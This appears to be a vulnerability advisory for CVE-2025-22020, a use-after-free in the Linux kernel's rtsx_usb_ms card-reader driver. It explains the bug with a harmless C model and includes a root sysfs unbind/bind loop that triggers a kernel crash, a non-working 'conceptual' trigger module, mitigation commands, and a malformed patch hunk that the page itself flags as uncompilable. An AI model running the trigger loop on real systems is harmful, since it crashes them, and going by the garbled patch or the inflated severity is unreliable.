CVE-2025-22020 is a slab use-after-free in the Linux kernel's `rtsx_usb_ms` driver, the Memory Stick (memstick) host half of the Realtek rtsx_usb USB card-reader stack. On device removal the driver frees its host object while delayed work that still references that object is queued, so the work is left holding a dangling pointer.
When `rtsx_usb_ms_drv_remove()` is called (e.g., on USB disconnection or a sysfs driver unbind), it frees the `msh` (memstick host) structure, which embeds the driver's private host state, but does not cancel the still-queued `poll_card` work. When that work later runs on a kworker, `rtsx_usb_ms_poll_card()` dereferences the freed host, and a KASAN build reports a slab-use-after-free: an 8-byte read of freed slab memory (address ffff888136335380 in the public report). On a kernel without KASAN the same access surfaces as a general protection fault or silent corruption rather than a labelled report.
The bug is reachable by anyone who can remove, or emulate the removal of, a Realtek rtsx_usb reader while the poll work is queued; the device does not need to be malicious, it only needs to disappear at the wrong moment, and repeated hotplugging or unbind/bind cycles make that window easy to hit. The demonstrated outcome is a kernel crash (denial of service). Turning the dangling reference into privilege escalation would require controlling what reoccupies the freed slab object and has not been shown publicly.
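The ordering problem described above, and the trigger condition listed under the exploitation analysis further down, reduce to one question: is the poll work cancelled before the object it references is freed? The following single-threaded C model is an added example written for this page; it is not kernel code and not the driver's own. The names rtsx_usb_ms, poll_card, memstick_free_host and cancel_delayed_work_sync are borrowed from the driver, but the slab is a static one-slot object that records frees instead of unmapping memory, the workqueue is a pending flag drained by hand, and the eject check at the top of the poll routine is modelled on, not copied from, the driver. Three teardown variants (free with work queued, set an eject flag without cancelling, cancel then free) show why a flag alone is not a substitute for cancelling the work.

```c
/*
 * Added single-threaded model of the rtsx_usb_ms teardown ordering bug; not
 * kernel code. The "slab" is one static object that records whether it was
 * freed (memory stays mapped, so dangling reads are counted, not faulted on),
 * and the workqueue is a pending flag drained by hand. Names follow the driver.
 */
#include <stdbool.h>
#include <string.h>

struct rtsx_usb_ms {            /* driver private data inside the memstick host */
    bool eject;
    int  host_mutex_locked;     /* stands in for mutex_lock(&host->host_mutex) */
};

static struct { struct rtsx_usb_ms obj; bool freed; } slab;
static int uaf_reads;           /* dangling reads observed in this scenario */
static struct rtsx_usb_ms *memstick_alloc_host(void)
{
    memset(&slab, 0, sizeof slab);
    uaf_reads = 0;
    return &slab.obj;
}

static void memstick_free_host(struct rtsx_usb_ms *host)
{
    (void)host; slab.freed = true;   /* object goes back to the freelist */
}

static struct rtsx_usb_ms *rd(struct rtsx_usb_ms *host)
{
    if (slab.freed)             /* every field read in the work goes through here */
        uaf_reads++;            /* what KASAN reports as slab-use-after-free */
    return host;
}

struct delayed_work {           /* minimal stand-in for the kernel type */
    bool pending;
    struct rtsx_usb_ms *host;
};
static struct delayed_work poll_card;

static void rtsx_usb_ms_poll_card(struct rtsx_usb_ms *host)
{
    /* An eject check at the top (modelled on the driver) does not help:
     * reading host->eject is itself a read of freed memory. */
    if (rd(host)->eject)
        return;
    rd(host)->host_mutex_locked = 1;    /* the mutex_lock() KASAN flagged */
}

static void schedule_delayed_work(struct delayed_work *w, struct rtsx_usb_ms *host)
{
    w->pending = true;
    w->host = host;
}

static void run_pending_work(struct delayed_work *w)   /* kworker, after the timer fires */
{
    if (!w->pending)
        return;
    w->pending = false;
    rtsx_usb_ms_poll_card(w->host);
}

static void cancel_delayed_work_sync(struct delayed_work *w)
{
    w->pending = false;         /* nothing queued or running once this returns */
}

/* Unpatched teardown: free while the work is still queued -> 2 dangling reads. */
int remove_unpatched(void)
{
    struct rtsx_usb_ms *host = memstick_alloc_host();
    schedule_delayed_work(&poll_card, host);
    memstick_free_host(host);
    run_pending_work(&poll_card);
    return uaf_reads;
}

/* Flag only: the work still runs and reads host->eject after the free -> 1. */
int remove_eject_only(void)
{
    struct rtsx_usb_ms *host = memstick_alloc_host();
    schedule_delayed_work(&poll_card, host);
    host->eject = true;
    memstick_free_host(host);
    run_pending_work(&poll_card);
    return uaf_reads;
}

/* Patched teardown: cancel synchronously, then free -> 0 dangling reads. */
int remove_patched(void)
{
    struct rtsx_usb_ms *host = memstick_alloc_host();
    schedule_delayed_work(&poll_card, host);
    host->eject = true;
    cancel_delayed_work_sync(&poll_card);
    memstick_free_host(host);
    run_pending_work(&poll_card);   /* nothing pending, nothing runs */
    return uaf_reads;
}
```

The counting slab is what makes the model deterministic and safe to run; on a real heap the same three sequences would be an ASan report, a silent read of recycled memory, and a clean exit respectively. The middle case is the one to remember when reviewing teardown paths: any "am I being removed" flag that lives inside the object being freed is read through the dangling pointer, so the work must be cancelled (and waited for) before the free, not merely told to stop.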
DailyCVE Form:
Platform: Linux Kernel
Version: Kernels without the fix (the public report reproduced on 6.14.0-rc6+)
Vulnerability: Use-After-Free
Severity: Critical
Date: 2025-04-16
What Undercode Say:
Exploitation Analysis:
1. Trigger Condition:
- Insert/remove a Realtek-based USB card reader repeatedly, or unbind/rebind its driver from sysfs.
- The delayed work (rtsx_usb_ms_poll_card) must still be queued when rtsx_usb_ms_drv_remove() frees the host, so that it runs after the deallocation.
2. Proof-of-Concept (PoC) Steps:
Simulate device removal while the poll work is queued. rtsx_usb is a USB interface driver, so its unbind/bind files take an interface id such as 1-1:1.0 (see ls /sys/bus/usb/drivers/rtsx_usb/), not a device id like 1-1; unbinding it tears down the rtsx_usb_ms platform child and runs rtsx_usb_ms_drv_remove(). Run as root; only a CONFIG_KASAN kernel prints the labelled report.
IFACE="1-1:1.0"   # adjust to the interface listed under /sys/bus/usb/drivers/rtsx_usb/
while true; do
    echo "$IFACE" > /sys/bus/usb/drivers/rtsx_usb/unbind
    echo "$IFACE" > /sys/bus/usb/drivers/rtsx_usb/bind
done
3. Exploit Payload (Conceptual):
// Conceptual: force the rtsx_usb interface to be released, which removes the
// rtsx_usb_ms platform child and runs rtsx_usb_ms_drv_remove(). This will not
// link against a stock kernel because rtsx_usb_driver is not an exported
// symbol; the sysfs unbind loop above does the same job without a module.
#include <linux/module.h>
#include <linux/usb.h>
MODULE_LICENSE("GPL");
extern struct usb_driver rtsx_usb_driver;   /* defined in rtsx_usb.c, not exported */
static int __init trigger_uaf(void)
{
	struct usb_interface *intf;
	/* usb_find_interface() looks up by USB minor number; rtsx_usb registers
	 * no minor, so on a real system this returns NULL. */
	intf = usb_find_interface(&rtsx_usb_driver, 0);
	if (!intf)
		return -ENODEV;
	usb_driver_release_interface(&rtsx_usb_driver, intf);
	return 0;
}
module_init(trigger_uaf);
Mitigation Commands:
1. Patch Application:
For distribution kernels the practical fix is the vendor's updated kernel package. For a source build:
git clone https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git
cd linux
git apply patch-CVE-2025-22020.diff   # only needed on a checkout that predates the fix; current mainline already carries it
2. Temporary Workaround:
Blacklist the vulnerable module. A plain blacklist entry only stops alias-based autoloading, so the install line is added to refuse an explicit modprobe as well. This disables Memory Stick support only; the SD half of the reader (rtsx_usb_sdmmc) keeps working.
echo "blacklist rtsx_usb_ms" > /etc/modprobe.d/disable_rtsx.conf
echo "install rtsx_usb_ms /bin/false" >> /etc/modprobe.d/disable_rtsx.conf
modprobe -r rtsx_usb_ms   # fails while a Memory Stick is mounted; unmount it first
3. Kernel Debugging:
Check for active instances:
lsmod | grep rtsx_usb_ms
Monitor kernel logs. The "KASAN: slab-use-after-free" line only appears on kernels built with CONFIG_KASAN; a production kernel hitting the same bug logs a general protection fault or a kworker oops instead, so match those as well:
dmesg -w | grep -E "KASAN: slab-use-after-free|general protection fault|rtsx_usb_ms"
Patch Code Reference:
a/drivers/memstick/host/rtsx_usb_ms.c +++ b/drivers/memstick/host/rtsx_usb_ms.c @@ -XXX,XXX +XXX,XXX @@ static void rtsx_usb_ms_drv_remove(struct platform_device pdev) { struct rtsx_usb_ms host = platform_get_drvdata(pdev); + cancel_work_sync(&host->poll_card); memstick_remove_host(host->msh); memstick_free_host(host->msh); }
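Review bot: As written the hunk does not compile: both declarations lost their pointer asterisks and must read `static void rtsx_usb_ms_drv_remove(struct platform_device *pdev)` and `struct rtsx_usb_ms *host = platform_get_drvdata(pdev);`, since platform_get_drvdata() returns a pointer and the platform remove callback receives one. The `@@ -XXX,XXX +XXX,XXX @@` header is a placeholder, so `git apply` will reject this text; take the hunk from the fix commit rather than applying this copy. One more check before merging the added line: if `poll_card` is declared as `struct delayed_work` and armed with schedule_delayed_work(), as it is in the upstream rtsx_usb_ms driver, the call has to be `cancel_delayed_work_sync(&host->poll_card)`; cancel_work_sync() takes a `struct work_struct *`, and cancelling only the embedded work would leave an armed timer free to requeue it. The placement itself is right: a synchronous cancel before memstick_remove_host()/memstick_free_host() is exactly what stops the work from running against freed memory.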
Detection Command:
Check the kernel version and compare it against your distribution's advisory for this CVE; lsmod only tells you the vulnerable code is loaded, not whether it is patched:
uname -r
Verify if the vulnerable module is loaded:
lsmod | grep rtsx_usb_ms
Impact Summary:
- CVSS 4.0 Score: 9.1 (Critical)
- Attack Vector: Physical/local (USB hotplug or sysfs driver unbind of a Realtek rtsx_usb reader)
- Privilege Escalation: Not demonstrated; the public report is a kernel crash (DoS). Escalation would require controlling what reoccupies the freed slab object before the poll work runs.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode